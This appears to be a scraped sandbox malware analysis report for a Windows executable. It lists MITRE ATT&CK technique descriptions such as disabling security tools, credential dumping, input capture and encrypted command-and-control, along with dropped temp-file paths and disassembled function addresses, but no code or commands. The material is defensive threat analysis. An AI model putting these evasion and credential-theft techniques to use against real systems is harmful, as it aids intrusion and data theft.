Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CJE003889.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\092Ny-13W

C:\Users\user\AppData\Local\Temp\autBA2.tmp

C:\Users\user\AppData\Local\Temp\bezzo

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
CJE003889.exe

Function 00C63B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00C649A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00C64E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00CC9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00C63015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00C63041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00C6708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00C63A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00C63633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00C63766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 010157E0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00C89AE6 Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Function 00C639D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre